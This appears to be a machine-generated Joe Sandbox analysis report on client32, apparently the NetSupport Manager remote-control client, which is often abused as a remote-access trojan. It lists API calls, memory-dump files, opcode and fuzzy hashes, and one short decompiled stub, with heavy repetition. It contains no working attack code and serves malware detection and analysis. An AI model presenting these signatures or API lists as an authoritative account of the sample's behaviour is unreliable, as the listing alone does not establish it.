                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E00E31000(intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t3;

				_t3 = _a16;
				_push(_t3);
				_push(_a12); // executed
				L00E310BC(); // executed
				return _t3;
			}




                                                                                                                              0x00e31003
                                                                                                                              0x00e31009
                                                                                                                              0x00e3100a
                                                                                                                              0x00e3100b
                                                                                                                              0x00e31011

                                                                                                                              APIs
                                                                                                                              • _NSMClient32@8.PCICL32(?,?,?,00E310A8,00000000), ref: 00E3100B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.827403044.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.827390548.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_e30000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Client32@8
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 433899448-0
                                                                                                                              • Opcode ID: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
                                                                                                                              • Instruction ID: 811947f4c1ef4d5c9d30ef57ac7f26fa17cdd1e64361c8fbecfe950f98975e94
                                                                                                                              • Opcode Fuzzy Hash: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
                                                                                                                              • Instruction Fuzzy Hash: BCB092B611034D9B8718EE98E951C7B33DCAA48600F00490DBD01533429A61FC60DA72
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1116C488 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                                              • Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
                                                                                                                              • Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 11114590 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93keyboardsleepwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PeekMessageA.USER32 ref: 111145D5
                                                                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                              • GetKeyState.USER32(00000090), ref: 11114600
                                                                                                                                • Part of subcall function 11113190: DeviceIoControl.KERNEL32 ref: 111131E2
                                                                                                                                • Part of subcall function 11113190: keybd_event.USER32 ref: 11113215
                                                                                                                              • GetKeyState.USER32(00000014), ref: 1111464C
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 1111466E
                                                                                                                              • GetKeyState.USER32(00000091), ref: 111146A4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: State$ControlDeviceMessagePeekSleep__wcstoi64keybd_event
                                                                                                                              • String ID: DisableSyncCapsLock$DisableSyncNumLock$DisableSyncScrollLock$View
                                                                                                                              • API String ID: 1459313812-451981794
                                                                                                                              • Opcode ID: 92a02af96b9782a677d8efa23df43d304ab3a2f27eca0560cb5cc5af9f65b839
                                                                                                                              • Instruction ID: 124f8e62a6da658c60687918a6121e4bc492e5a03fd0ed5725fd2557b003e167
                                                                                                                              • Opcode Fuzzy Hash: 92a02af96b9782a677d8efa23df43d304ab3a2f27eca0560cb5cc5af9f65b839
                                                                                                                              • Instruction Fuzzy Hash: 6131D93478074297E320DB34CD45B9AF7E5AB4470CF004829E79A5E6C9EB79B940C79A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                                                              • FindWindowA.USER32 ref: 110934EA
                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                                                                • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32 ref: 11091982
                                                                                                                                • Part of subcall function 11093410: GetClassInfoA.USER32 ref: 11093424
                                                                                                                                • Part of subcall function 11091A50: CreateWindowExA.USER32 ref: 11091A9D
                                                                                                                                • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                                                                • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B1A
                                                                                                                                • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                                                                • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                                                                • Part of subcall function 11091B00: DispatchMessageA.USER32 ref: 11091B5B
                                                                                                                                • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B6B
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                                                                • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32 ref: 110919FE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                                              • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                              • API String ID: 1622498684-2883797795
                                                                                                                              • Opcode ID: f5bc02ccdd994365aae92b3d14d2e1809bab94170bd7887c8e57794d90e6eed1
                                                                                                                              • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                                                              • Opcode Fuzzy Hash: f5bc02ccdd994365aae92b3d14d2e1809bab94170bd7887c8e57794d90e6eed1
                                                                                                                              • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11148360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,1102EA98,?), ref: 1114837D
                                                                                                                              • wsprintfA.USER32 ref: 1114839B
                                                                                                                              • OutputDebugStringA.KERNEL32(?,?,1102EA98,?), ref: 111483B1
                                                                                                                                • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                                                                • Part of subcall function 11148010: GetCurrentThreadId.KERNEL32 ref: 11148023
                                                                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480A3
                                                                                                                                • Part of subcall function 11148010: IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
                                                                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480E8
                                                                                                                                • Part of subcall function 11148010: wsprintfA.USER32 ref: 11148105
                                                                                                                              • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F6
                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F9
                                                                                                                                • Part of subcall function 110B7F30: GetLastError.KERNEL32(1111025B,11195AD8,?,?,11029B81,?,11195AD8,1111025B,00000000), ref: 110B7F5C
                                                                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F6B
                                                                                                                                • Part of subcall function 110B7F30: _strrchr.LIBCMT ref: 110B7F8D
                                                                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FBD
                                                                                                                                • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FE8
                                                                                                                                • Part of subcall function 110B7F30: GetMessageA.USER32 ref: 110B800C
                                                                                                                                • Part of subcall function 110B7F30: TranslateMessage.USER32(?), ref: 110B8015
                                                                                                                                • Part of subcall function 110B7F30: DispatchMessageA.USER32 ref: 110B801E
                                                                                                                              • GetKeyState.USER32(00000011), ref: 11148419
                                                                                                                              Strings
                                                                                                                              • Exception caught at %x. Trying minidump., xrefs: 11148395
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                                                                              • String ID: Exception caught at %x. Trying minidump.
                                                                                                                              • API String ID: 490122820-543155386
                                                                                                                              • Opcode ID: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                                                                              • Instruction ID: 29a59b4c4c914cd8c532226d15f5e4317bff798f4e19c00b73adffff4a71f3ad
                                                                                                                              • Opcode Fuzzy Hash: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                                                                              • Instruction Fuzzy Hash: 3121F875D002189BD715DBA4DDC0FD9F3B8EB1C709F0040A8EA1597A84DBB06E84CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                                                              • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$FindLoadLock
                                                                                                                              • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                                              • API String ID: 2752051264-327499879
                                                                                                                              • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                                              • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                                                              • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                                              • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                                              • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CountIconicTick
                                                                                                                              • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                                              • API String ID: 1307367305-2838568823
                                                                                                                              • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                              • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                                              • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                              • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsIconic.USER32 ref: 110C10AD
                                                                                                                              • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                                                              • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$BringCurrentIconicShowThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4184413098-0
                                                                                                                              • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                              • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                                              • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                              • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110EE230 Relevance: 4.5, APIs: 3, Instructions: 27memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DescriptorSecurity$AllocDaclInitializeLocal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1946635556-0
                                                                                                                              • Opcode ID: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
                                                                                                                              • Instruction ID: 48c328ce5276e0414f5d06d79fad6670dbdd187e0f7480751a5c204fdfa869f7
                                                                                                                              • Opcode Fuzzy Hash: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
                                                                                                                              • Instruction Fuzzy Hash: ACF0127068031A9FE7148F64C9D9F80B7E8A716B08F144064F6259B2D4D6B1D4428B14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
